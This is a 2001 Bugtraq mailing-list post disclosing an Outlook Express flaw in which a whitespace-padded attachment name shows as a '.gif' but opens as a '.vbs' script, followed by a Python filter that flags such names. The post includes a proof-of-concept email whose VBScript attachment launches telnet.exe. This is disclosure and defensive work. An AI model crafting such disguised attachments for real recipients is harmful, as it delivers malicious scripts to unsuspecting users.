Bugtraq mailing list archives
Re: HTML.dropper
From: Shane Hird <s.hird () STUDENT QUT EDU AU>
Date: Fri, 19 Jan 2001 09:19:45 -0000
Hi,

With some testing, I've found that the 'subject-overflow' problem is irrelevant to the 'filename overflow' problem, although as mentioned, this may help to overcome some email filters/scanners. It seems OE is cutting the file name short to a specified length when trying to open it (consequently chopping off the real extension), but not cutting it short when determining which icon to use. (Note that the icon choice doesn't seem to be affected like this with the subject overflow problem.)

The following is an example which will produce a 'normal' email, with a standard attachment, however the 'filename' of the attachment is four characters too long, which just happens to be the '.gif' which gets chopped off, leaving just '.vbs'. The filename displayed for the attachment will be 'nicepic.gif', followed by a lot of spaces which obviously aren't seen. Adjust the filename size as necessary for the client in question.

I predict a new breed of i-worm to be using this technique in a short while.

<snip email.eml>
To: "anyone () home com"
Subject:anything
Date: Fri, 19 Jan 2001 18:44:39 +1000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_000B_01C08247.E5DF4F00"

------=_NextPart_000_000B_01C08247.E5DF4F00
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="nicepic.gif .vbs.gif"

set WshShell = WScript.CreateObject ("WScript.Shell")
WshShell.Run("telnet.exe")
------=_NextPart_000_000B_01C08247.E5DF4F00
</snip>

I apologise if this is already known, however I felt it should be clarified for this thread.

-Shane
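A filter-side check for the filename trick described in the message above, as an added example that is not part of the original post: it flags attachment names that are padded with whitespace or that carry an executable extension ahead of the final one. The RISKY set, the three-space threshold and the sample message (40 padding spaces, placeholder body) are constructed assumptions.

```python
import re
from email import message_from_string

# Assumption: illustrative subset of extensions Windows will execute.
RISKY = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".exe", ".scr", ".pif", ".bat", ".cmd", ".hta"}
PAD = re.compile(r"\s{3,}")                         # run of padding whitespace
EXT = re.compile(r"\.[A-Za-z0-9]{1,5}(?=\s|\.|$)")  # every extension-like token

def check_filename(name):
    """Return the reasons an attachment filename looks disguised."""
    findings = []
    exts = [e.lower() for e in EXT.findall(name)]
    if PAD.search(name):
        findings.append("whitespace-padding")
    if any(e in RISKY for e in exts[:-1]):
        # Becomes the effective extension if a client truncates the name.
        findings.append("hidden-risky-extension")
    if exts and exts[-1] in RISKY:
        findings.append("risky-extension")
    return findings

def scan_message(raw):
    """Map each suspicious attachment filename in a raw message to its findings."""
    report = {}
    for part in message_from_string(raw).walk():
        name = part.get_filename()  # legacy parser keeps whitespace inside the quotes
        hits = check_filename(name) if name else []
        if hits:
            report[name] = hits
    return report

# Constructed sample: 40 padding spaces is an arbitrary choice, the body is a placeholder.
PADDED = "nicepic.gif" + " " * 40 + ".vbs.gif"
SAMPLE = "\n".join([
    "Subject: anything",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="b1"',
    "",
    "--b1",
    "Content-Type: image/gif",
    'Content-Disposition: attachment; filename="%s"' % PADDED,
    "",
    "placeholder",
    "--b1--",
    "",
])

if __name__ == "__main__":
    for name, hits in scan_message(SAMPLE).items():
        print(repr(name), hits)
```

The check runs on the full, untruncated filename, so it does not depend on knowing the length at which a given client cuts the name.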